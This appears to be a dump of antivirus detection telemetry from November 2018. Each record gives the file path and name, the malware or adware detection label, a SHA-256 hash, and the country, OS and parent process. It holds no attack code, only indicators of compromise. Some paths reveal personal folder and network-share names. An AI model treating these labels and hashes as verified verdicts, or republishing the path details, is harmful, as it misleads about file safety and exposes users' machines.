  Row(detection=Row(filename='avscan-20181101-122906-fa8a21fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-122844-E7964DE6\\AVSCAN-20181101-122906-FA8A21FD', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:29:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='TR/Patched.Ren.Gen.#M300.#R2947'), hash='a31f7d8eac8f7074475314b245cec9d8ea0cc65bd26d74c6f0d157ebddbd4126', metadata=Row(cmdline='\\\\\\/Embedding', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-01T00:43:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='5bdbede0a0bbc7d09dd0d228d82b3148fe9c74128c678e5379280c842c2d9280', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-25.categorizing\\5BDBEDE0A0BBC7D09DD0D228D82B3148FE9C74128C678E5379280C842C2D9280', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='5bdbede0a0bbc7d09dd0d228d82b3148fe9c74128c678e5379280c842c2d9280', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T10:11:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111008-f450d4b2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111008-F450D4B2', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:09:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xerces-c_1_6_0.dll', filepath='D:\\AutoCAD2009\\x86\\xerces-c_1_6_0.dll', filesize=1536000, name='W32/Ramnit.A.#M1.#R1'), hash='44d73b70f5bc66adb08c739dd549e80534b79cc3b6a7507b3aea447f58425db0', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:37:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T09:12:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bh2002.exe', filepath='\\?\\J:\\العاب2\\المدفعية الجديدة\\BH2002.EXE', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='209a1fb486767016999dc616320353d50f7af5bdf0fbb82337a5da41d280fb4c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:11:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='C:\\Archivos de programa\\ProKAward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:04:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-104152-191a9759', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9a85bc91\\AVSCAN-20181101-103701-F094D29C\\AVSCAN-20181101-104152-191A9759', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T03:41:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002410-4377d8da', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002410-4377D8DA', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:24:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-001748-b4afe1f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a430745e\\AVSCAN-20181102-001632-AB2E9224\\AVSCAN-20181102-001748-B4AFE1F0', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:17:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-232030-d7464e1d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_22556673\\AVSCAN-20181101-232016-D5A4362E\\AVSCAN-20181101-232030-D7464E1D', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:20:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xerces-c_1_6_0.dll', filepath='D:\\AutoCAD2009\\x86\\xerces-c_1_6_0.dll', filesize=1536000, name='W32/Ramnit.A.#M1.#R1'), hash='44d73b70f5bc66adb08c739dd549e80534b79cc3b6a7507b3aea447f58425db0', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:39:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-003425-860b0ed0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-003425-860B0ED0', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:34:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181103-005140-03ca4755', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0676114b\\AVSCAN-20181103-004831-E7F528C3\\AVSCAN-20181103-005140-03CA4755', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:16:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T01:26:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002203-35b163a7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-002012-29AB3F0F\\AVSCAN-20181102-002203-35B163A7', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:22:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-172650-d87095ee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_357a596a\\AVSCAN-20181101-172500-D01F2DF7\\AVSCAN-20181101-172650-D87095EE', filesize=64000, name='HEUR/Macro.Downloader.AMCY.Gen.#M1.#R1'), hash='03313ef6b59445d0491b38fad851ebb89a6e73751b567b84544002c83218995e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:26:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-193559-65a32eb6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_05d5989b\\AVSCAN-20181101-193534-6225F6FE\\AVSCAN-20181101-193559-65A32EB6', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:35:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000042f6', filepath='C:\\Windows\\Temp\\tmp00000360\\tmp000042f6', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T15:38:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T22:00:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-202659-95c79adb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ba9e3dde\\AVSCAN-20181101-202647-940668AF\\AVSCAN-20181101-202659-95C79ADB', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T23:27:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-164844-c252116f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9a412ece\\AVSCAN-20181101-164342-8EC7121A\\AVSCAN-20181101-164844-C252116F', filesize=64000, name='HEUR/AGEN.1015942.#M1.#R1'), hash='78c983e4d39b1fa91de20a4e5f44b820459691996aa674dbf66d604d841408aa', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:49:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T08:36:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='F:\\Autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T11:08:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0116533.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0116533.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:36:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='allfake.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\is-D5GS0.tmp\\AllFake.exe', filesize=1024000, name='Adware/CsdiMonetize.vgssx.#M1.#R1'), hash='2ca558499e6b9e872f4efe36145d1a52668b8e36f4eccad678575dad8d594f64', metadata=Row(cmdline=None, country='PG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:17:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='uepdorimdg.bat', filepath='C:\\uepdorimdg.bat', filesize=512000, name='TR/Taranis.2886.#M0.#R0'), hash='eeb30022f7c3503064471543d222174092dacb7e964ee1ea21f0c4fe8a60e3ec', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T03:29:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='9d9032232a879ff61de13167d860627620ddc88a81d897d9bf4cf7502ec5115f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\9D9032232A879FF61DE13167D860627620DDC88A81D897D9BF4CF7502EC5115F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='9d9032232a879ff61de13167d860627620ddc88a81d897d9bf4cf7502ec5115f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:08:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service_18bdd202.vir', filepath='\\\\?\\C:\\Applications\\Service_18bdd202.VIR', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ترتيب الحروف.exe', filepath='\\\\?\\K:\\العاب فلاش\\ترتيب الحروف.exe', filesize=672000, name='W32/Neshta.A.#M1.#R1'), hash='8a254f061d8ecc5015f96bfd159fce908d3a097713f78e1f200bb20c0d05f193', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:47:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094458-04993d3b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094458-04993D3B', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:45:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='\\\\?\\C:\\Windows\\system32\\AUDIODG.EXE', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='aa13c3c41c4a718e4b0c4da457094f6a51caf4689210aafa551e98bfe2f13b14', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:21:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ut9tl4ek.exe', filepath='C:\\New folder\\برامج مكافحة للفيروسات\\ut9tl4ek.exe', filesize=384000, name='HEUR/AGEN.1000498.#M1.#R1'), hash='a146cfe85e2301113fd71b2c667234a314bd021295f358d9bc414274f40c7928', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T21:59:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093526-96fd8680', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093526-96FD8680', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:35:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='df624e4c78cd667868b15b0a37b754b1b1ca35c147311bc650445da494fbfdbf', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T05:03:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$recycle.bin.exe', filepath='H:\\$RECYCLE.BIN.exe', filesize=384000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-01T21:15:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maxunzip.exe', filepath='C:\\PROGRAM FILES\\Autodesk\\3DS MAX 2013\\maxunzip.exe', filesize=92000, name='W32/Sality.AT.#M1.#R1'), hash='d03bc9dd261ae58634f8d3b1aaaf90177dca21160a72a4ec22b776d3809dda0d', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:12:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094929-38925b7d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094929-38925B7D', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:49:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\WinSxS\\x86_microsoft-windows-d..b-standardcollector_31bf3856ad364e35_10.0.15063.0_none_e6376d51f3e7328e\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='f30f45f64f9915a54a72936aa73d011b180246953a9e06118d22da07808df075', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:07:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-165817-7e6b2ca5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d44abda7\\AVSCAN-20181101-165623-7572B90A\\AVSCAN-20181101-165817-7E6B2CA5', filesize=64000, name='HEUR/Macro.Downloader.FAB.Gen.#M1.#R1'), hash='9766a96e18bebe93b58cfb3154a35ae732c466884e0d7343b6d888b596e47132', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:58:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='economia programmi.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\MATERIALE DIDATTICO\\SORZI PROGRAMMI\\economia programmi.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:30:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='uiqkgyyd.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\UiqKGYYd.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-145539-229c63b9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4d656672\\AVSCAN-20181101-144434-E2499C00\\AVSCAN-20181101-145539-229C63B9', filesize=320000, name='PUA/DownloadSponsor.Gen.#M1.#R1'), hash='c3cd658e9d163ab548f9d2e37cd03d997069d146755a45283b48b9b3e07bd6e9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:55:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='per project work.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\CHIAVETTA TESI\\TESI MASTER\\master doc\\PER PROJECT WORK.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:20:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-170027-5e989fbd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1831079a\\AVSCAN-20181101-165915-53313C4A\\AVSCAN-20181101-170027-5E989FBD', filesize=1088000, name='ADWARE/MultiPlug.Gen7.#M1.#R1'), hash='c7b3c1972f7d4f5faeccafd711e339afe1c7dff2a78dba717b32d6af552aa1fb', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:00:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='incarichi.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\INCARICHI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:22:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150047-9da06b2a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_36c54126\\AVSCAN-20181101-145905-8A15D273\\AVSCAN-20181101-150047-9DA06B2A', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:00:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\gskhe3iyanc\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='\\\\\\/uac', country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=6025496, timestamp='2018-11-01T16:02:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sm_sr.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsaDB04.tmp\\SM_SR.dll', filesize=1952000, name='Adware/Widgi.vqxpa.#M1.#R1'), hash='592b7d066b4a229f997bf6ab2da7137333d44655d716c292bf8a9dfc2f474e57', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:38:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msinfo32.exe', filepath='\\\\?\\C:\\Windows\\system32\\msinfo32.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='137e9f3a29c0dbea1e928b20a4ef1e562c63ff12ab657865479d9bc28171fdd1', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:25:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='downloader-fuer-findmac_setup.exe', filepath='\\\\Weinis-NAS\\Volume_1\\Z Tools\\Netzwerk\\Downloader-fuer-findmac_setup.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='ab7ff086162a1524755709db2fe64c6b59f5f020ab48a85921fe9b9500dadadc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Utilities\\wwiBackup\\wwiBackup.exe', parentsize=178688, timestamp='2018-11-04T14:23:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='noteicon.exe', filepath='C:\\Program Files\\IObit\\IObit Uninstaller\\NoteIcon.exe', filesize=116000, name='TR/Patched.Ren.Gen.#M300.#R2947'), hash='0121252491e1b22093a267ad3ccb52b8ffcd503dc00e8b0019523f4e131da1a6', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:blqslEQdTkWpZmqf.1', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122536, timestamp='2018-11-04T20:27:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-225456-239446c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e7bd116\\AVSCAN-20181104-225227-1042A9D6\\AVSCAN-20181104-225456-239446C7', filesize=128000, name='TR/Krypt.lkfna.#M1.#R1'), hash='33d69fa6ccc1befaa7873fd9d41937925752c0237be06c1be9ec2c72c4c9ee02', metadata=Row(cmdline=None, country='PS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:54:57Z'), dt=datetime.date(2018, 11, 4)),
